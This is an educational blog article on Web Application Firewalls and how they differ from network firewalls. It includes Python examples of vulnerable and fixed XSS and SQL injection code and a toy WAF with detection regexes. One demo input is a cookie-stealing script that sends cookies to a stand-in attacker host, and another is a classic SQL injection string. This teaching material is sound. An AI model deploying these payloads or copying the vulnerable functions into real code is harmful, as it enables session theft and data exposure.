
What is a WAF?

 
WAF stands for Web Application Firewall.
 
You already know that your network firewalls are there to protect your network from outside threats. However, a network firewall cannot defend your web-facing applications very well, because the traffic that attacks them (HTTP and HTTPS on ports 80 and 443) is exactly the traffic the firewall has to let through.
 
Historically, WAF adoption was driven by PCI DSS. Its requirement 6.6 gives organisations that handle card data a choice between regular application vulnerability assessments and an automated solution that detects and prevents web-based attacks, such as a WAF, so a retailer or a financial service provider would typically already be running one. In recent years this has changed, as most cybersecurity professionals have realised that they can no longer afford to skip deploying a WAF, because their unprotected web applications are attractive targets for cybercriminals looking for easy entry points into their networks.
 
Your web applications consistently face Cross-site Scripting (XSS), SQL injection, application-layer DoS attacks, and session and cookie hijacking. (Man-in-the-middle attacks on the connection itself are a different problem; a WAF does not prevent them, TLS does.) Take XSS: the flaws that allow it are in application code and are quite widespread. A successful attack is possible anywhere your web application takes input from a user and reflects or stores it in the output it generates without first validating or encoding it.
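As an added illustration (this code is not from the article), here is the root cause of the two flaws named above, XSS and SQL injection, next to the fix that belongs in the application code itself. A WAF in front of this code can only block payloads it recognises; the fixed versions remove the flaw. The table, the user names and the payloads are constructed for the example.

```python
import html
import sqlite3

def make_db():
    """Constructed in-memory sample data; not from any real system."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, is_admin INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", 0), ("bob", 1)])
    return conn

def greet_vulnerable(user_input: str) -> str:
    # Reflected XSS: raw user input is placed straight into the HTML output,
    # so a '<script>' in the input becomes a script that the browser runs.
    return f"<p>Hello, {user_input}!</p>"

def greet_safe(user_input: str) -> str:
    # Output encoding: every character that could start markup or break out
    # of an attribute ('<', '>', '&', quotes) is escaped before it is emitted.
    return f"<p>Hello, {html.escape(user_input, quote=True)}!</p>"

def find_user_vulnerable(conn, name: str):
    # SQL injection: the input is concatenated into the query text, so a quote
    # in the input ends the string literal and the rest is parsed as SQL.
    return sorted(conn.execute(
        f"SELECT name FROM users WHERE name = '{name}'").fetchall())

def find_user_safe(conn, name: str):
    # Parameterised query: the input is bound as data and is never parsed as SQL.
    return sorted(conn.execute(
        "SELECT name FROM users WHERE name = ?", (name,)).fetchall())

if __name__ == "__main__":
    conn = make_db()
    xss_payload = '<script>document.location="http://evil.example/?c="+document.cookie</script>'
    print(greet_vulnerable(xss_payload))   # script reaches the victim's browser
    print(greet_safe(xss_payload))         # rendered as harmless text
    sqli_payload = "x' OR '1'='1"
    print(find_user_vulnerable(conn, sqli_payload))   # every row comes back
    print(find_user_safe(conn, sqli_payload))         # no user has that name
```

The two `_safe` functions are the only real fix; a WAF rule that blocks `' OR '1'='1` does nothing against the next variant the attacker tries.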
 
The fact is, securing application environments presents a unique and persistent challenge to your security teams.
 
Commercial code (in your web applications) can also be vulnerable because of poor security hygiene, especially when a lack of resources prevents your security team from applying patches and security fixes as soon as they are available.
 
If you thought that we are dealing here with your external web-facing applications only, then you are wrong. External web applications are only half of the problem.
Your 'internal' web applications are the other half, especially those designed and developed by your in-house teams. Believe it or not, applications developed in-house are often considered even easier to attack or compromise than your external apps, once attackers have gained access to your internal network. You might be thinking: WHY is that so?
  • Because CUSTOM code is traditionally one of the weakest security links in a lot of organisations...
  • Because your internal app development teams may or may not be up to date on all the new types of cyber-attacks...
  • Because they may or may not do the sort of deep 'cross-application' vulnerability testing that commercial developers are usually able to do.
I have mentioned above that securing these applications is a unique challenge...
 
For example, the web application through which you take online purchase orders from your customers may be a single external application, but it may in turn call dozens of your internal applications: one that checks and restocks inventory, one for shipment handling, one for shipping labels, one for payment processing, one for invoicing, one that adds the purchase to the customer's shopping history, one for emailing, and so on...
 
Not only can each of these applications be exploited individually, but sometimes modifying a shared library, or even changing the order in which these applications are invoked, can open a vulnerability to exploitation.
 
These sorts of attacks can be notoriously problematic for your organisation if you mistakenly believe that your perimeter defences (read: firewalls) have you fully protected. The reality is that a perimeter breach is simply a matter of time. The most effective place to start with any application security strategy is to assume that your perimeter defences will be compromised.
 
That's why deploying a Web Application Firewall makes great sense for all organisations.
 
👉 How is WAF different from Network Firewall?
 
Remember that a WAF protects your web applications by inspecting HTTP/HTTPS traffic. It is different from a standard firewall, which provides a barrier between 'external' and 'internal' network traffic.
 
Your WAF sits between your external users and your web applications and analyses all HTTP communication. It detects and blocks malicious requests before they reach your web applications or your users. As a result, a WAF shields your 'business-critical' web applications and web servers from application-layer attacks, including attacks on vulnerabilities you have not yet been able to patch (often called virtual patching). Keep in mind that a WAF matches known attack patterns: it reduces exposure, but it does not make a vulnerable application secure, and attackers routinely probe for rule bypasses. This matters all the more as your company expands into new digital initiatives, which can leave new web applications and APIs exposed to cyber-attacks.
 
Conversely, your network firewall protects your local-area network (LAN) from unauthorised access. Its primary objective is to separate a secured zone from a less secure zone and to control communications between the two. Without it, any computer with a public Internet Protocol (IP) address is reachable from outside the network and potentially at risk of attack. Firewall policies define the traffic allowed onto the network, and any other access attempt is blocked.
 
A WAF specifically targets application traffic.
-

👉 Layer 7 vs Layer 3/4

Let us now look at the difference from a technical point of view...
 
The key technical difference between a WAF and a network-level firewall is the layer at which they operate.
 
A WAF defends against attacks at Layer 7 of the OSI model, the application layer. That is why it covers attacks carried inside application traffic, such as SQL injection, cookie manipulation and malformed URLs, as well as attacks aimed at client-side technologies like Ajax, ActiveX and JavaScript. Your WAF works on the web application protocols HTTP and HTTPS, which connect web browsers and web servers.
 
For example, a Layer 7 DDoS attack floods the server layer where web pages are generated and delivered in response to HTTP/HTTPS requests; each request looks well-formed, so a packet filter lets it through. Your WAF mitigates this by acting as a 'reverse proxy' in front of the targeted server: it terminates the connections, rate-limits requests per client, and filters requests whose patterns identify the use of DDoS tools, so the origin server never has to generate pages for them.
 
Network firewalls operate at Layers 3 and 4 of the OSI model, the network and transport layers, where they see IP addresses, protocols and ports rather than requests. That is why they control access to the ports used by services such as the Domain Name System (DNS), File Transfer Protocol (FTP), Simple Mail Transfer Protocol (SMTP), Secure Shell (SSH) and Telnet, blocking unauthorised connections to them, but they do not inspect what is sent over a connection they have allowed.
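To make the Layer 3/4 versus Layer 7 distinction concrete, here is an added example (not code from the article) that puts a tiny stateless packet filter next to a tiny WAF-style request inspector and runs both over the same constructed traffic. The rule set, the two signatures, the rate limit and the sample requests are all assumptions made for the illustration; the point is that every request arrives on TCP/443 and so passes the packet filter, while only the Layer 7 inspector, which parses the HTTP request, can tell the SQL injection, the XSS payload and the request flood from the legitimate search.

```python
import ipaddress
import re
from collections import defaultdict, deque
from urllib.parse import unquote_plus

# --- Layer 3/4: a packet filter sees only protocol, addresses and ports ---
# Hypothetical rule set (an assumption of this example, not from the article):
# (protocol, source network, destination port, action); first match wins.
L34_RULES = [
    ("tcp", "0.0.0.0/0", 443, "allow"),   # anyone may reach the HTTPS front end
    ("tcp", "10.0.0.0/8", 22, "allow"),   # SSH only from the internal range
]

def l34_decide(proto: str, src_ip: str, dst_port: int) -> str:
    """Stateless 5-tuple check. Anything unmatched is denied by default."""
    src = ipaddress.ip_address(src_ip)
    for rproto, net, port, action in L34_RULES:
        if rproto == proto and port == dst_port and src in ipaddress.ip_network(net):
            return action
    return "deny"

# --- Layer 7: a WAF-style inspector parses the HTTP request itself -------
# Two illustrative signatures; a real WAF ships thousands and normalises
# input far more aggressively (double decoding, comments, case tricks...).
SIGNATURES = {
    "sqli": re.compile(r"(?i)('\s*or\s+'?\d+'?\s*=\s*'?\d+|union\s+select)"),
    "xss":  re.compile(r"(?i)(<\s*script|javascript:|<\s*\w+[^>]*\son\w+\s*=)"),
}
RATE_WINDOW_SECONDS = 10
RATE_LIMIT = 5      # a 6th request within the window from one client is a flood
_seen = defaultdict(deque)   # client ip -> request timestamps inside the window

def parse_http(raw: str):
    """Split a raw HTTP/1.1 request into method, target, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body

def l7_decide(raw_request: str, client_ip: str, now: float) -> str:
    """Return 'allow' or 'block:<reason>' for one request from one client."""
    _method, target, headers, body = parse_http(raw_request)
    # Sliding-window rate limit per client: catches Layer 7 floods whose
    # requests are each individually well-formed.
    window = _seen[client_ip]
    window.append(now)
    while now - window[0] > RATE_WINDOW_SECONDS:
        window.popleft()
    if len(window) > RATE_LIMIT:
        return "block:rate-limit"
    # Decode before matching: '%27' would otherwise hide a quote from the regex.
    fields = (unquote_plus(target), unquote_plus(body), headers.get("cookie", ""))
    for field in fields:
        for name, sig in SIGNATURES.items():
            if sig.search(field):
                return f"block:{name}"
    return "allow"

# Constructed sample traffic (not captured from any real system). All three
# requests go to TCP/443, so the packet filter must let every one of them in.
SAMPLE_REQUESTS = [
    ("203.0.113.7", "GET /search?q=blue+shoes HTTP/1.1\r\nHost: shop.example\r\n\r\n"),
    ("203.0.113.7", "GET /item?id=1%27+OR+%271%27%3D%271 HTTP/1.1\r\nHost: shop.example\r\n\r\n"),
    ("203.0.113.9", "POST /review HTTP/1.1\r\nHost: shop.example\r\n"
                    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
                    "text=%3Cscript%3Ealert(1)%3C%2Fscript%3E"),
]

def run_samples():
    """Decide each sample at Layer 3/4 and at Layer 7; returns (l34, l7) pairs."""
    _seen.clear()
    return [(l34_decide("tcp", ip, 443), l7_decide(raw, ip, now=0.0))
            for ip, raw in SAMPLE_REQUESTS]

def simulate_flood(client_ip: str = "198.51.100.4", count: int = 8):
    """One client sending `count` benign requests one second apart."""
    _seen.pop(client_ip, None)
    benign = SAMPLE_REQUESTS[0][1]
    return [l7_decide(benign, client_ip, now=float(i)) for i in range(count)]

if __name__ == "__main__":
    for (ip, raw), (l34, l7) in zip(SAMPLE_REQUESTS, run_samples()):
        print(raw.split("\r\n")[0].ljust(50), "L3/4:", l34, " L7:", l7)
    print("flood:", simulate_flood())
```

Two things worth noticing when you run it: the packet filter returns `allow` for all three requests because it has no concept of a query string or a body, and the Layer 7 verdict depends on decoding the request before matching, which is exactly where WAF bypass research concentrates (encodings and protocol quirks the inspector normalises differently from the application behind it).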
 

👉 What Can You Do To Protect Your Web-Applications?

 
You can begin by reviewing the OWASP Top 10 list, which tracks the most common classes of application attacks.
 
Your WAF protects your business from web-based attacks targeted at your applications. Without an application firewall, attackers could infiltrate your broader network through web application vulnerabilities.
 
Your network firewalls, on the other hand, control which hosts and ports can be reached by traffic going 'in' and 'out' of your network. They protect against network-wide attacks on the devices and systems that connect to the internet: unauthorised access to services that should not be exposed, port scans, and lateral movement once an attacker has a foothold. This is something your WAF cannot do, since it only sees HTTP and HTTPS traffic to the applications placed behind it.
 
Your WAF and your network firewalls are two different things altogether! So rather than competing, they complement each other.
 
Rather than selecting one or the other, your challenge is to select the WAF that best suits your business's needs. The WAF should have enough capacity to inspect your traffic (TLS termination and deep inspection are CPU-heavy, so hardware acceleration or adequate sizing matters), monitor traffic and block malicious attempts, be highly available, and scale to maintain performance as the business grows.
 
You need up-to-date threat intelligence too. So it is critical that you deploy a WAF solution that not only addresses the most common threats, but that can also use IP reputation services and receives regular feeds and updates from a global threat service.
 
Additionally, many web application security solutions offer a correlation engine that pulls in and analyses events from all security layers. This expands visibility across your entire environment and automatically combines 'local' and 'global' threat intelligence, so the product can make more accurate decisions to better protect your organisation.
 
This is where Next-Generation Firewalls (NGFWs) can help. NGFWs add application awareness and intrusion prevention to the traditional network firewall, and some vendors bundle WAF functionality into the same centrally managed system. They also add context to security policies (which user, which application), which is vital to protect your business from modern threats.
 
However, it is vital to make sure that your NGFW (if you have one) actually covers all the bases for both network and web application protection: application identification and IPS signatures are not the same thing as a dedicated WAF's understanding of your HTTP requests.
 
Vulnerability scanning is another critical element for your organisation to stay protected. You need to know which devices you have deployed across your network, which operating systems and patch levels they run, and which applications run on or pass through them.
 
-
 
Kindly write 💚 your comment 💚 on these posts or topics, because when you do, you help me greatly in ✍️ designing new quality articles and posts on cybersecurity.
 
You can also share with all of us whether the information here helped you in some way.
 
Life is short, so make the most of it!
Also take care of yourself and your beloved ones…
 
With thanks,
Meena R.
_______

This article was written and published by Meena R, Senior Manager - IT, at Luminis Consulting Services Pvt. Ltd, India.

Over the past 16 years, Meena has built a following of IT professionals, particularly in Cybersecurity, Cisco Technologies, and Networking...
